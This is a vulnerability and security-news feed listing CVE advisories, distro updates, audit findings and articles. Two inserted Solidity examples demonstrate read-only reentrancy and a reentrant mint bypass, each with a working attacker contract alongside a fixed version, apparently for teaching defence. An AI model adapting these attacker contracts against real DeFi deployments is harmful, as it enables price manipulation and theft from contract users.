Summary IBM® Db2® is vulnerable to an information disclosure vulnerability due to the consumed GSKit library. Vulnerability Details CVEID: CVE-2023-33850 DESCRIPTION: IBM GSKit-Crypto could allow a remote attacker to obtain sensitive information, caused by a timing-based side channel in the...
7.5CVSS
7.4AI Score
0.001EPSS
Calls to get_virtual_price() are vulnerable to read-only reentrancy
Lines of code 117 Vulnerability details Impact get_virtual_price() was originally considered to be a manipulation-resistant price - suitable as a price oracle, but it was later found to be vulnerable to a read-only reentrancy attack, where the Curve contract could be put into a...
6.9AI Score
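The read-only reentrancy described above, as an added example that is not part of the finding and not Curve's code: a deliberately simplified pool model, a consumer that trusts get_virtual_price() as-is, and one that pokes the pool's reentrancy lock before reading. The pool interface, the reserve accounting (reserves per LP token instead of the invariant D), the absence of an LP token balance check, and the zero-amount remove_liquidity() probe are all assumptions made for illustration; real Curve pools are written in Vyper, and which lock-protected function is safe to call with zero amounts varies per pool.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not Curve's or the audited project's code. MockPool is a
// simplified ETH/token pool: it burns LP tokens, pays out ETH (handing control to the
// caller), and only then releases the second coin, so a view read mid-call sees a
// state that never exists between transactions.

interface ICurvePoolLike {
    function get_virtual_price() external view returns (uint256);
    function remove_liquidity(uint256 amount, uint256[2] calldata minAmounts) external;
}

contract MockPool is ICurvePoolLike {
    uint256 public totalSupply = 2000e18;   // LP tokens outstanding (no balance check: assumption)
    uint256 public reserveEth = 1000e18;    // first coin (ETH), in wei; fund the contract to match
    uint256 public reserveToken = 1000e18;  // second coin, tracked as a number only
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "pool: locked");
        locked = true;
        _;
        locked = false;
    }

    function remove_liquidity(uint256 amount, uint256[2] calldata) external nonReentrant {
        uint256 ethOut = reserveEth * amount / totalSupply;
        uint256 tokenOut = reserveToken * amount / totalSupply;
        totalSupply -= amount;                              // LP burned first
        reserveEth -= ethOut;
        (bool ok, ) = msg.sender.call{value: ethOut}("");   // control leaves the pool here
        require(ok, "pool: eth send failed");
        reserveToken -= tokenOut;                           // second coin leaves only after the call
    }

    // Simplified "virtual price": reserves per LP token. It is a view, so the
    // reentrancy lock above does not protect it.
    function get_virtual_price() external view returns (uint256) {
        return (reserveEth + reserveToken) * 1e18 / totalSupply;
    }

    receive() external payable {}
}

// Reads the view directly. Inside the ETH callback, LP supply and the ETH reserve
// have already dropped but the token reserve has not, so the ratio is inflated.
contract VulnerableOracle {
    ICurvePoolLike public immutable pool;
    constructor(ICurvePoolLike p) { pool = p; }
    function lpPrice() external view returns (uint256) { return pool.get_virtual_price(); }
}

// Pokes a lock-protected, state-changing pool function with zero amounts before reading.
// If the pool is mid-call, its lock reverts and the read never happens. Cannot be
// `view`, and needs receive() because the zero-ETH payout is still a raw call.
contract GuardedOracle {
    ICurvePoolLike public immutable pool;
    constructor(ICurvePoolLike p) { pool = p; }
    function lpPrice() external returns (uint256) {
        uint256[2] memory zero;
        pool.remove_liquidity(0, zero);   // assumption: a zero-amount withdrawal is a no-op
        return pool.get_virtual_price();
    }
    receive() external payable {}
}

// Withdraws liquidity and reads both oracles from inside the pool's ETH payout.
contract ReadOnlyReentrant {
    MockPool public immutable pool;
    VulnerableOracle public immutable vulnerable;
    GuardedOracle public immutable guarded;
    uint256 public priceSeenByVulnerable;
    bool public guardedReverted;

    constructor(MockPool p, VulnerableOracle v, GuardedOracle g) { pool = p; vulnerable = v; guarded = g; }

    function attack(uint256 lpAmount) external {
        uint256[2] memory zero;
        pool.remove_liquidity(lpAmount, zero);
    }

    receive() external payable {
        priceSeenByVulnerable = vulnerable.lpPrice();   // 1.5e18 for lpAmount = 1000e18; true price 1e18
        try guarded.lpPrice() returns (uint256) { guardedReverted = false; }
        catch { guardedReverted = true; }                // "pool: locked"
    }
}
```

Deploy MockPool and send it 1000 ether, deploy the two oracles against it, deploy ReadOnlyReentrant and call attack(1000e18): priceSeenByVulnerable reads 1.5e18 while the honest price before and after the transaction is 1e18, and guardedReverted is true because the pool's lock was held. The guard works precisely because the probe is a state-changing call that shares the lock with remove_liquidity(); a second view read would be just as stale.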
Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft
AmzWord an automated attack chain based on CVE-2022-30190,...
8.1AI Score
christmas-ar.com Improper Access Control vulnerability OBB-3795652
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
7AI Score
What is Recovery Time Objective (RTO)?
Grasping the Technique: The Often Misconstrued 'RTO' Unravelled in the Sphere of Business Resiliency At the heart of organisational durability and a tactical roadmap directing towards reestablishing regular operations post-disruptions, lies the often misrepresented 'Recovery Time Objective' (RTO).....
6.8AI Score
Within the sphere of IT, 'network accessibility' is a term frequently used. Yet, does everyone understand its connotation? Simplistically put, network accessibility alludes to how readily a network or system can be accessed by its users. It quantifies to what extent a system is functioning and...
7.9AI Score
Question: Who said the sentence below? “Privacy is at the heart of everything we do.” Answer: Sundar Pichai, the CEO of Alphabet and its largest subsidiary Google. And if you look at the recent actions Google has announced, you’d be tempted to take his word for it: An initiative to let Chrome...
6.9AI Score
Dominating an imperative role in boosting the so-called 'efficiency quotient' within a networking system is the Quality of Service or QoS. Let's dive in and explore the crucial components that make QoS pivotal. In essence, QoS is a blend of a multitude of methodologies and hi-tech devices,...
7.9AI Score
The dark side of Black Friday: decoding cyberthreats around the year’s biggest shopping season
As the annual Black Friday approaches, the digital landscape experiences an unprecedented surge in e-commerce and online shopping activity. Major sales aside, e-commerce is still a huge market. In 2022, global e-commerce retail revenue was estimated to reach $5.7 trillion worldwide, marking nearly....
7.1AI Score
8Base Group Deploying New Phobos Ransomware Variant via SmokeLoader
The threat actors behind the 8Base ransomware are leveraging a variant of the Phobos ransomware to conduct their financially motivated attacks. The findings come from Cisco Talos, which has recorded an increase in activity carried out by the cybercriminals. "Most of the group's Phobos variants are....
7.6AI Score
Price can be easily inflated/deflated by large depositors in the Market contract
Lines of code https://github.com/code-423n4/2023-11-canto/blob/335930cd53cf9a137504a57f1215be52c6d67cb3/1155tech-contracts/src/bonding_curve/LinearBondingCurve.sol#L21-L22 Vulnerability details Impact An attacker can manipulate/inflate market prices by donating/buying large amounts of tokens which....
7.1AI Score
kernel security, bug fix, and enhancement update
[4.18.0-513.5.1_9.OL8] - Update Oracle Linux certificates (Kevin Lyons) - Disable signing for aarch64 (Ilya Okomin) - Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237] - Update x509.genkey [Orabug: 24817676] - Conflict with...
8.8CVSS
8AI Score
Alarm system cyberattack leaves those in need struggling to call for help
An alarm system company that allows those in need to ask for help at the touch of a button has suffered a cyberattack, causing serious disruption. Tunstall Netherlands says the attack left the control room struggling to receive distress calls from clients on Sunday November 12, 2023. Tunstall,...
7.1AI Score
7 common mistakes companies make when creating an incident response plan and how to avoid them
Cisco Talos recently covered the basics of NIS2, a new set of requirements for cybersecurity and security incident disclosures set to take effect next year in the European Union. As part of these new guidelines, organizations with operations in the EU must have up-to-date "incident handling"...
6.9AI Score
What is a Network Management Station (NMS) ?
The Bedrock of the Network Coordination Hub (NCH) Delving into the substantial domain of digital networks, the Network Coordination Hub (NCH) is unveiled as a critical component ensuring fluid network operations. Let us unravel this concept - an NCH signifies a control console employed for...
7.2AI Score
What Is Microservices Architecture
Mastering the Essential Elements of Services-Focused Programming The methodology of programming using tiny, interdependent software units, often simplified to 'Microservices', has seen a marked uptick in usage in recent times. This distinct architectural paradigm shapes an application as a group...
7.9AI Score
FREE Cybersecurity Education Courses
Navigating the nuanced realm of digital defense doesn't need to feel like a herculean task. This section aims to shed light on the intricacies of digital defense and aid you in leveraging freely available Cybersecurity Learning Programs. Deciphering Digital Defense Digital defense, also referred...
7.5AI Score
Urgent: VMware Warns of Unpatched Critical Cloud Director Vulnerability
VMware is warning of a critical and unpatched security flaw in Cloud Director that could be exploited by a malicious actor to get around authentication protections. Tracked as CVE-2023-34060 (CVSS score: 9.8), the vulnerability impacts instances that have been upgraded to version 10.5 from an...
9.8CVSS
10AI Score
0.044EPSS
ManageEngine SupportCenter Plus < 11.0 Build 11023
The version of ManageEngine SupportCenter Plus installed on the remote host is prior to 11.0 Build 11023. It is, therefore, affected by a vulnerability as referenced in the supportcenter_cve-2022-36412 advisory. In Zoho ManageEngine SupportCenter Plus before...
9.8CVSS
6.9AI Score
0.009EPSS
Microsoft Security Advisory CVE-2023-36049: .NET Elevation of Privilege Vulnerability
Microsoft Security Advisory CVE-2023-36049: .NET Elevation of Privilege Vulnerability Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 6.0, .NET 7.0 and .NET 8.0 RC2. This advisory also provides guidance on what developers can do.....
9.8CVSS
7.2AI Score
0.001EPSS
Microsoft Security Advisory CVE-2023-36558: .NET Security Feature Bypass Vulnerability
Microsoft Security Advisory CVE-2023-36558: .NET Security Feature Bypass Vulnerability Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core 6.0, ASP.NET Core 7.0 and, ASP.NET Core 8.0 RC2. This advisory also provides guidance.....
6.2CVSS
6.8AI Score
0.0005EPSS
CISA Sets a Deadline - Patch Juniper Junos OS Flaws Before November 17
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given a November 17, 2023, deadline for federal agencies and organizations to apply mitigations to secure against a number of security flaws in Juniper Junos OS that came to light in August. The agency on Monday added five...
9.8CVSS
9.6AI Score
0.965EPSS
The reentrancy vulnerability in NextGenCore can allow an attacker to manipulate minting execution
Lines of code Vulnerability details Impact Function _mintProcessing() has been used in mint() and airDropTokens() and both doesn't follow check-effect-interaction pattern and code updates the values of tokensAirdropPerAddress, tokensMintedAllowlistAddress and tokensMintedPerAddress variables after....
7.3AI Score
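The check-effects-interactions violation described in the NextGenCore finding above, as an added example that is not the project's code: a minimal capped mint whose _mintProcessing() notifies contract recipients through an ERC721-style receiver hook, shown in the vulnerable ordering (counter updated after the external call) and in the fixed ordering. The contract names, the per-address cap and the receiver callback are assumptions for illustration; the real contract's state variables and mint flow are only partially quoted in the finding.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not NextGenCore's code. The receiver hook is the interaction
// that lets a contract recipient re-enter mint() before the counter is updated.

interface IERC721Receiver {
    function onERC721Received(address operator, address from, uint256 tokenId, bytes calldata data)
        external returns (bytes4);
}

abstract contract MintBase {
    uint256 public constant MAX_PER_ADDRESS = 2;            // assumed cap
    mapping(address => uint256) public tokensMintedPerAddress;
    mapping(uint256 => address) public ownerOf;
    uint256 public nextId;

    function mint() external virtual;

    // Assigns the token and notifies contract recipients: this is the interaction.
    function _mintProcessing(address to) internal {
        uint256 id = nextId++;
        ownerOf[id] = to;
        if (to.code.length > 0) {
            bytes4 ret = IERC721Receiver(to).onERC721Received(msg.sender, address(0), id, "");
            require(ret == IERC721Receiver.onERC721Received.selector, "bad receiver");
        }
    }
}

// Check, interaction, then effect. A receiver that re-enters mint() from
// onERC721Received() sees the old counter and passes the cap check every time.
contract MintVulnerable is MintBase {
    function mint() external override {
        require(tokensMintedPerAddress[msg.sender] < MAX_PER_ADDRESS, "cap");   // check
        _mintProcessing(msg.sender);                                            // interaction
        tokensMintedPerAddress[msg.sender] += 1;                                // effect (too late)
    }
}

// Check, effect, then interaction, with a reentrancy guard as a second line of defence.
contract MintFixed is MintBase {
    bool private locked;
    modifier nonReentrant() { require(!locked, "reentrant"); locked = true; _; locked = false; }

    function mint() external override nonReentrant {
        require(tokensMintedPerAddress[msg.sender] < MAX_PER_ADDRESS, "cap");   // check
        tokensMintedPerAddress[msg.sender] += 1;                                // effect
        _mintProcessing(msg.sender);                                            // interaction
    }
}

// Re-enters mint() from the receiver hook until it holds well over the cap.
contract ReentrantMinter is IERC721Receiver {
    MintBase public immutable target;
    uint256 public callbacks;
    constructor(MintBase t) { target = t; }

    function attack() external { target.mint(); }

    function onERC721Received(address, address, uint256, bytes calldata) external returns (bytes4) {
        callbacks += 1;
        if (callbacks < 10) {
            try target.mint() {} catch {}   // MintVulnerable: succeeds; MintFixed: reverts on the lock
        }
        return IERC721Receiver.onERC721Received.selector;
    }
}
```

Against MintVulnerable, one attack() call mints ten tokens to the attacker (the outer call plus nine nested ones) and tokensMintedPerAddress only reaches 10 as the stack unwinds, long after every cap check has passed. Against MintFixed the same attack() mints exactly one token: the counter is already 1 when the hook runs, and the nested mint() is additionally stopped by the lock. The ordering change alone is sufficient; the guard is there so that a future change to _mintProcessing() cannot silently reopen the hole.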
DoS (Denial of Service) org.jsoup:jsoup in Jira Software Data Center and Server
This High severity Third-Party Dependency vulnerability was introduced in versions 8.20.0, 9.4.0, 9.5.0, 9.6.0, 9.7.0, 9.8.0, 9.9.0, 9.10.0, and 9.11.0 of Jira Software Data Center and Server. This Third-Party Dependency vulnerability, with a CVSS Score of 7.5 and a CVSS Vector of...
7.5CVSS
6.5AI Score
0.009EPSS
Apigee API Security policies howto
The Genesis of Apigee API Security Guidelines In today's digital epoch, APIs (Application Programming Interfaces) have ascended to be the fundamental infrastructure underpinning software development - furnishing the medium for diverse software systems to interact and exchange data. Yet, with this.....
7.7AI Score
Lines of code Vulnerability details Bug Description The recent implementation update empowers the authority to decrease the totalVotingPower arbitrarily using the decreaseTotalVotingPower() function. This authority-exclusive function allows the reduction of totalVotingPower by a specified amount......
7.3AI Score
The 2023 Qualys Security Conference (QSC) started wrapping up on Thursday, November 9th, with two days of new technology announcements, impactful customer use cases, and thought-provoking talks from a host of engaging speakers, including Rachel Wilson, Managing Director at Morgan Stanley and Frank....
7.3AI Score
What is NIS2, and how can you best prepare for the new cybersecurity requirements in the EU?
NIS2 is a European directive that includes new measures to ensure that organizations operating in the European Union (EU) have a high common level of network and infrastructure security. The "directive" outlines the goals all EU member states must achieve. However, each country will implement it...
7.1AI Score
CBL Mariner 2.0 Security Update: kubernetes (CVE-2020-8554)
The version of kubernetes installed on the remote CBL Mariner 2.0 host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the CVE-2020-8554 advisory. Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and...
6.3CVSS
6.7AI Score
0.002EPSS
12 Cloud Security Issues Risks, Threats and Challenges
Unpacking the Cloud: Appreciating its Importance & Uncovering its Weak Points The cloud has utterly transformed our methods of data storage and retrieval. It has flawlessly woven itself into the fabric of our everyday lives, from a repository for precious memories to a platform that supports...
7.1AI Score
Rocky Linux 8 : firefox (RLSA-2022:8554)
The remote Rocky Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2022:8554 advisory. Service Workers should not be able to infer information about opaque cross-origin responses; but timing information for cross-origin media combined...
9.8CVSS
7.2AI Score
0.002EPSS
Rocky Linux 8 : firefox (RLSA-2022:0130)
The remote Rocky Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2022:0130 advisory. It was possible to construct specific XSLT markup that would be able to bypass an iframe sandbox. This vulnerability affects Firefox ESR < 91.5,...
10CVSS
7.9AI Score
0.002EPSS
Rocky Linux 8 : thunderbird (RLSA-2022:0129)
The remote Rocky Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2022:0129 advisory. It was possible to construct specific XSLT markup that would be able to bypass an iframe sandbox. This vulnerability affects Firefox ESR < 91.5,...
10CVSS
7.7AI Score
0.002EPSS
Fedora 39 : firefox (2023-a0ac4fe21c)
The remote Fedora 39 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2023-a0ac4fe21c advisory. A compromised content process could have provided malicious data to FilterNodeD2D1 resulting in an out-of-bounds write, leading to a...
9.8CVSS
7.9AI Score
0.001EPSS
Automatic Conditional Access policies in Microsoft Entra streamline identity protection
Extending our commitment to help customers be secure by default, today we're announcing the auto-rollout of Microsoft Entra Conditional Access policies that will automatically protect tenants based on risk signals, licensing, and usage. We've designed these policies based on our deep knowledge of.....
7.2AI Score
Incident Response Plan: Frameworks and Steps
Gaining Insight: The Imperative for an Electronic Threat Handling Framework As we traverse further into the digital era, the threat of cyber encroachments elevates consistently. This looming risk is a reality for all, from emergent startups to well-established corporations, placing operations in...
7AI Score
Gaming-related cyberthreats in 2023: Minecrafters targeted the most
Introduction and trends The gaming industry continues growing. The Newzoo report for 2023 reveals that two in five — more than three billion — across the globe are gamers, which is 6.3 percent more than last year. Globally, gaming revenue amounts to an estimated US$242.39 billion, with almost half....
6.4AI Score
Rocky Linux 8 : GNOME (RLSA-2020:4451)
The remote Rocky Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2020:4451 advisory. A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7,...
9.8CVSS
9AI Score
0.806EPSS
Amazon Linux 2023 : openssl, openssl-devel, openssl-libs (ALAS2023-2023-406)
It is, therefore, affected by a vulnerability as referenced in the ALAS2023-2023-406 advisory. Issue summary: A bug has been identified in the processing of key and initialisation vector (IV) lengths. This can lead to potential truncation or overruns during the initialisation of some...
7.5CVSS
7.6AI Score
0.001EPSS
Summary IBM® Db2® is vulnerable to an information disclosure vulnerability due to the consumed GSKit library. The fix for this issue was already published in an earlier bulletin. If you have already applied the appropriate Db2 special build or installed GSKit version 8.0.55.31, which contains the.....
7.5CVSS
6AI Score
0.001EPSS
Ibexa ezplatform-kernel download route allows filename change
Impact The route used for file downloads allows specifying the name of the downloaded file. This is an unintended side effect of the implementation, and means one could construct download URLs with filenames that have no relation to the actual file, which could lead to misunderstandings and...
6.8AI Score
Ibexa DXP Download route allows filename change
Impact The route used for file downloads allows specifying the name of the downloaded file. This is an unintended side effect of the implementation, and means one could construct download URLs with filenames that have no relation to the actual file, which could lead to misunderstandings and...
7AI Score
Download route allows filename change in eZpublish kernel
Impact The route used for file downloads allows specifying the name of the downloaded file. This is an unintended side effect of the implementation, and means one could construct download URLs with filenames that have no relation to the actual file, which could lead to misunderstandings and...
7AI Score
SaaS Security is Now Accessible and Affordable to All
This new product offers SaaS discovery and risk assessment coupled with a free user access review in a unique "freemium" model Securing employees' SaaS usage is becoming increasingly crucial for most cloud-based organizations. While numerous tools are available to address this need, they often...
7AI Score